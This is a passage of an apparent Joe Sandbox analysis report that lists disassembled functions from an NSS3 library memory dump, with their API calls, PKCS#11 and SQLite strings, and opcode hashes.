SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF4EC0

Part of subcall function 6CAF4470: TlsGetValue.KERNEL32(00000000,?,6CAB7296,00000000), ref: 6CAF4487
Part of subcall function 6CAF4470: EnterCriticalSection.KERNEL32(?,?,?,6CAB7296,00000000), ref: 6CAF44A0
Part of subcall function 6CAF4470: PR_Unlock.NSS3(?,?,?,?,6CAB7296,00000000), ref: 6CAF44BB

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF4F16
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF4F2E
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF4F40
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF4F6C
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF4F80
PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF4F8F
PK11_UpdateSlotAttribute.NSS3(?,6CBCDCB0,00000000), ref: 6CAF4FFE
PK11_UserDisableSlot.NSS3(0000001E), ref: 6CAF501F
SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?,?,6CAB78F8), ref: 6CAF506B

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$Param$CriticalEnterErrorFlagModuleSectionUnlockfree$DestroyK11_Slotstrcmp$AttributeDisableFindInitTextUpdateUsermallocmemcpy
String ID:
API String ID: 560490210-0
Opcode ID: b05f16d259058ad13a88dfad89926a2f7ec9823a84ce149c5898f9931e554a19
Instruction ID: 9fb4597759352890650ce3b7a914d3872e61cef88091555dc6ac3a274d5c8a9e
Opcode Fuzzy Hash: b05f16d259058ad13a88dfad89926a2f7ec9823a84ce149c5898f9931e554a19
Instruction Fuzzy Hash: 1C5124B5A002019FEB119F64ED0169B76B4FF0535CF094534F82A92B01FB32D59ACBD2

Function 6CA9ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA9ACE2
malloc.MOZGLUE(00000001), ref: 6CA9ACEC
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CA9AD02
TlsGetValue.KERNEL32 ref: 6CA9AD3C
calloc.MOZGLUE(00000001,?), ref: 6CA9AD8C
PR_Unlock.NSS3 ref: 6CA9ADC0
free.MOZGLUE(00000000), ref: 6CA9AE48
PR_SetError.NSS3(FFFFE890,00000000), ref: 6CA9AE58
free.MOZGLUE(00000000), ref: 6CA9AE69
free.MOZGLUE(?), ref: 6CA9AE78
PR_Unlock.NSS3 ref: 6CA9AE8C
free.MOZGLUE(?), ref: 6CA9AEAB
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA9AEC7

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
String ID:
API String ID: 786543732-0
Opcode ID: 754b7377ac8eef82e710ccd5a0e598be9c49ca44d85461cd9b17754347fd113d
Instruction ID: ebac9e24fef3e6125f2b24f42f7a51f7c3a16b5b76bead50ca9d580502c4a1be
Opcode Fuzzy Hash: 754b7377ac8eef82e710ccd5a0e598be9c49ca44d85461cd9b17754347fd113d
Instruction Fuzzy Hash: 07519EB0F105258BDB00DF68DC426AEB7F5EB06348F19002AD814A7B10D731ED94CBD2

Function 6CADADC0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6CADADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CADAE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CADAE29

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CADAE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CADAE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CADAE8A
PR_LogPrint.NSS3(?,00000000), ref: 6CADAEA0

Strings

C_MessageSignInit, xrefs: 6CADADE1
hKey = 0x%x, xrefs: 6CADAE62, 6CADAE72
hSession = 0x%x, xrefs: 6CADAE01, 6CADAE11
(CK_INVALID_HANDLE), xrefs: 6CADAE1F, 6CADAE80

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit
API String ID: 332880674-605059067
Opcode ID: 0e520247e7ffbf02060c42b3ea15272b311a00caf5d791ccf4a57b5ac990384e
Instruction ID: 9cb5218115152101a1a6282a35ff13e949476448e3f3800870fb467c60c60547
Opcode Fuzzy Hash: 0e520247e7ffbf02060c42b3ea15272b311a00caf5d791ccf4a57b5ac990384e
Instruction Fuzzy Hash: E2310775700295AFDB009F14DD48BBE3776EB4631DF4A4438E409AB601DF35AD88CB92

Function 6CAD9EE0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageEncryptInit), ref: 6CAD9F06
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD9F37
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD9F49

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD9F5F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6CAD9F98
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD9FAA
PR_LogPrint.NSS3(?,00000000), ref: 6CAD9FC0

Strings

C_MessageEncryptInit, xrefs: 6CAD9F01
hKey = 0x%x, xrefs: 6CAD9F82, 6CAD9F92
hSession = 0x%x, xrefs: 6CAD9F21, 6CAD9F31
(CK_INVALID_HANDLE), xrefs: 6CAD9F3F, 6CAD9FA0

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageEncryptInit
API String ID: 332880674-1139731676
Opcode ID: d749ff0137c078aee5dc7e1ec9942e7d795a89926aa5d80e3182f12fec3a2f97
Instruction ID: a8ce48b26e993a443759d5c2867d854e5e15cabf15ef88883fcbeff561be8cc6
Opcode Fuzzy Hash: d749ff0137c078aee5dc7e1ec9942e7d795a89926aa5d80e3182f12fec3a2f97
Instruction Fuzzy Hash: 2631B775701284ABDB009F24DE98BBE3775EB4631DF0A442CE509A7A41DF35ED88C792

Function 6CB74C40 Relevance: 19.3, APIs: 3, Strings: 8, Instructions: 97COMMON

Download Yara Rule

APIs

sqlite3_value_text16.NSS3(?), ref: 6CB74CAF
sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6CB74CFD
sqlite3_value_text16.NSS3(?), ref: 6CB74D44

Strings

out of memory, xrefs: 6CB74C78, 6CB74C9E
no more rows available, xrefs: 6CB74D2E
another row available, xrefs: 6CB74D20
abort due to ROLLBACK, xrefs: 6CB74D27, 6CB74D33
bad parameter or other API misuse, xrefs: 6CB74D05
unknown error, xrefs: 6CB74D56
API call with %s database connection pointer, xrefs: 6CB74CF6
invalid, xrefs: 6CB74CF1

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_value_text16$sqlite3_log
String ID: API call with %s database connection pointer$abort due to ROLLBACK$another row available$bad parameter or other API misuse$invalid$no more rows available$out of memory$unknown error
API String ID: 2274617401-4033235608
Opcode ID: b2459c442e80ccbe810fd9df699800717d2fa8113dc4ddba1da1552fcf0c6c35
Instruction ID: af3c1a65e47ec0e2909f7fef57dd4325763358264dd88d472ee87e4c6dbd31b4
Opcode Fuzzy Hash: b2459c442e80ccbe810fd9df699800717d2fa8113dc4ddba1da1552fcf0c6c35
Instruction Fuzzy Hash: 86316677A088E1A7D7284634A9017B9B366F78231BF160129DC749BE14CB61AC568FF3

Function 6CAD2DD0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6CAD2DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD2E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD2E33

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD2E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CAD2E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CAD2E81

Strings

pPin = 0x%p, xrefs: 6CAD2E63
C_InitPIN, xrefs: 6CAD2DF1
hSession = 0x%x, xrefs: 6CAD2E0E, 6CAD2E1E
(CK_INVALID_HANDLE), xrefs: 6CAD2E2C
ulPinLen = %d, xrefs: 6CAD2E7C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN
API String ID: 1003633598-1777813432
Opcode ID: 5e99f14cee225333371bd1bbbbe19528043ddb91fc0ee45e5abe7c8961a038e9
Instruction ID: 32a4fde064ae1e8bcc0c17ad7f126ead1c14b53c842d4cbe567cf30bd1415275
Opcode Fuzzy Hash: 5e99f14cee225333371bd1bbbbe19528043ddb91fc0ee45e5abe7c8961a038e9
Instruction Fuzzy Hash: E431F575701195ABDB008F14DD4CB9E3BB5EB4631DF0A4128E808A7712DF35AD88CBA2

Function 6CAD6EF0 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6CAD6F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD6F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD6F53

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD6F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CAD6F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CAD6FA1

Strings

ulPartLen = %d, xrefs: 6CAD6F9C
hSession = 0x%x, xrefs: 6CAD6F2E, 6CAD6F3E
(CK_INVALID_HANDLE), xrefs: 6CAD6F4C
pPart = 0x%p, xrefs: 6CAD6F83
C_DigestUpdate, xrefs: 6CAD6F11

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate
API String ID: 1003633598-226530419
Opcode ID: 4b0be80c393a02d72207df02d1287a297400d04d9c8104055c0b89c35fd27fe5
Instruction ID: aade52fa1c38882a2df3788e8f5f8827b1a0e670873897c08a6a68d9a7ba22f2
Opcode Fuzzy Hash: 4b0be80c393a02d72207df02d1287a297400d04d9c8104055c0b89c35fd27fe5
Instruction Fuzzy Hash: 9431A4757011949BDB009B24DD58BAE77B5EB46319F0A4428E808E7712DB35ED88CA92

Function 6CAD7E00 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyUpdate), ref: 6CAD7E26
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD7E54
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD7E63

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD7E79
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6CAD7E98
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6CAD7EB1

Strings

ulPartLen = %d, xrefs: 6CAD7EAC
hSession = 0x%x, xrefs: 6CAD7E3E, 6CAD7E4E
(CK_INVALID_HANDLE), xrefs: 6CAD7E5C
C_VerifyUpdate, xrefs: 6CAD7E21
pPart = 0x%p, xrefs: 6CAD7E93

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_VerifyUpdate
API String ID: 1003633598-2508624608
Opcode ID: 0ad4b62cced449276023a4750379ba7bf2a20765659854be9ebd9d3e2b6e334e
Instruction ID: ed7ec15fe882b044040f7e7a57bec1ceb9fcdbf3023ab5ed062b49734a868da9
Opcode Fuzzy Hash: 0ad4b62cced449276023a4750379ba7bf2a20765659854be9ebd9d3e2b6e334e
Instruction Fuzzy Hash: 5731E775B01195AFDB049B24DD48BAE77B5EB4231DF0B4028E808E7615DF31AD88CBA2

Function 6CAD7F30 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_VerifyFinal), ref: 6CAD7F56
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CAD7F84
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CAD7F93

Part of subcall function 6CBBD930: PL_strncpyz.NSS3(?,?,?), ref: 6CBBD963

PR_LogPrint.NSS3(?,00000000), ref: 6CAD7FA9
PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CAD7FC8
PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CAD7FE1

Strings

C_VerifyFinal, xrefs: 6CAD7F51
pSignature = 0x%p, xrefs: 6CAD7FC3
ulSignatureLen = %d, xrefs: 6CAD7FDC
hSession = 0x%x, xrefs: 6CAD7F6E, 6CAD7F7E
(CK_INVALID_HANDLE), xrefs: 6CAD7F8C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pSignature = 0x%p$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_VerifyFinal
API String ID: 1003633598-3315179127
Opcode ID: 91a1e427a487e039217e0300b31f4fd4bc3ee8d4282584b4ab91d5abcab4fa5e
Instruction ID: 70a32d64432c15564c22ac956c028fbab26fd3eb249df402efc9c363f375f7d1
Opcode Fuzzy Hash: 91a1e427a487e039217e0300b31f4fd4bc3ee8d4282584b4ab91d5abcab4fa5e
Instruction Fuzzy Hash: FB31A475701194ABDB10DF14DD48BAE77B5EB46319F4A4029E808A7611DB32AD88CBA2

Function 6CB72D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6CB72D9F

Part of subcall function 6CA2CA30: EnterCriticalSection.KERNEL32(?,?,?,6CA8F9C9,?,6CA8F4DA,6CA8F9C9,?,?,6CA5369A), ref: 6CA2CA7A
Part of subcall function 6CA2CA30: LeaveCriticalSection.KERNEL32(?), ref: 6CA2CB26

sqlite3_exec.NSS3(?,?,6CB72F70,?,?), ref: 6CB72DF9
sqlite3_free.NSS3(00000000), ref: 6CB72E2C
sqlite3_free.NSS3(?), ref: 6CB72E3A
sqlite3_free.NSS3(?), ref: 6CB72E52
sqlite3_mprintf.NSS3(6CBDAAF9,?), ref: 6CB72E62
sqlite3_free.NSS3(?), ref: 6CB72E70
sqlite3_free.NSS3(?), ref: 6CB72E89
sqlite3_free.NSS3(?), ref: 6CB72EBB
sqlite3_free.NSS3(?), ref: 6CB72ECB
sqlite3_free.NSS3(00000000), ref: 6CB72F3E
sqlite3_free.NSS3(?), ref: 6CB72F4C

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 04c4d952f9b32fb86bf5011da115e8954444f8e56cd5ecb9d06a839a0ab5040e
Instruction ID: cfb4583ad074117d0f9a2c12380ed5a655258a34223b65c4d10f9161863a883c
Opcode Fuzzy Hash: 04c4d952f9b32fb86bf5011da115e8954444f8e56cd5ecb9d06a839a0ab5040e
Instruction Fuzzy Hash: 26617EB5E01255CBEB10CF68D984BDEB7B1EF48358F144028DC65AB741E735E888CBA2

Function 6CAC2C40 Relevance: 18.2, APIs: 12, Instructions: 163COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(6CAC3F23,?,6CABE477,?,?,?,00000001,00000000,?,?,6CAC3F23,?), ref: 6CAC2C62
EnterCriticalSection.KERNEL32(0000001C,?,6CABE477,?,?,?,00000001,00000000,?,?,6CAC3F23,?), ref: 6CAC2C76
PL_HashTableLookup.NSS3(00000000,?,?,6CABE477,?,?,?,00000001,00000000,?,?,6CAC3F23,?), ref: 6CAC2C86
PR_Unlock.NSS3(00000000,?,?,?,?,6CABE477,?,?,?,00000001,00000000,?,?,6CAC3F23,?), ref: 6CAC2C93

Part of subcall function 6CB4DD70: TlsGetValue.KERNEL32 ref: 6CB4DD8C
Part of subcall function 6CB4DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB4DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6CABE477,?,?,?,00000001,00000000,?,?,6CAC3F23,?), ref: 6CAC2CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6CABE477,?,?,?,00000001,00000000,?,?,6CAC3F23,?), ref: 6CAC2CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6CABE477,?,?,?,00000001,00000000,?,?,6CAC3F23), ref: 6CAC2CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6CABE477,?,?,?,00000001,00000000,?), ref: 6CAC2CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6CABE477,?,?,?,00000001,00000000,?), ref: 6CAC2D4D
EnterCriticalSection.KERNEL32(?), ref: 6CAC2D61
PL_HashTableLookup.NSS3(?,?), ref: 6CAC2D71
PR_Unlock.NSS3(?), ref: 6CAC2D7E

Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907AD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907CD
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA2204A), ref: 6CA907D6
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA2204A), ref: 6CA907E4
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,6CA2204A), ref: 6CA90864
Part of subcall function 6CA907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA90880
Part of subcall function 6CA907A0: TlsSetValue.KERNEL32(00000000,?,?,6CA2204A), ref: 6CA908CB
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908D7
Part of subcall function 6CA907A0: TlsGetValue.KERNEL32(?,?,6CA2204A), ref: 6CA908FB

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID:
API String ID: 2446853827-0
Opcode ID: 02b1b7a74dc0fef9332a1a1bfb5c2aad794e1e2ea9aa7196713c62fb3a9f9264
Instruction ID: 7e16ac4da661736a5784d1319e59b3050d29ca9840f39ac655c69260a9393e18
Opcode Fuzzy Hash: 02b1b7a74dc0fef9332a1a1bfb5c2aad794e1e2ea9aa7196713c62fb3a9f9264
Instruction Fuzzy Hash: EF51E775E00505ABDB019F24EC459AA77B8FF1535CB088624ED1897B11E731EDE8C7E2

Function 6CAB7C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6CC02120,Function_00097E60,00000000,?,?,?,?,6CB3067D,6CB31C60,00000000), ref: 6CAB7C81

Part of subcall function 6CA24C70: TlsGetValue.KERNEL32(?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24C97
Part of subcall function 6CA24C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24CB0
Part of subcall function 6CA24C70: PR_Unlock.NSS3(?,?,?,?,?,6CA23921,6CC014E4,6CB6CC70), ref: 6CA24CC9

TlsGetValue.KERNEL32 ref: 6CAB7CA0
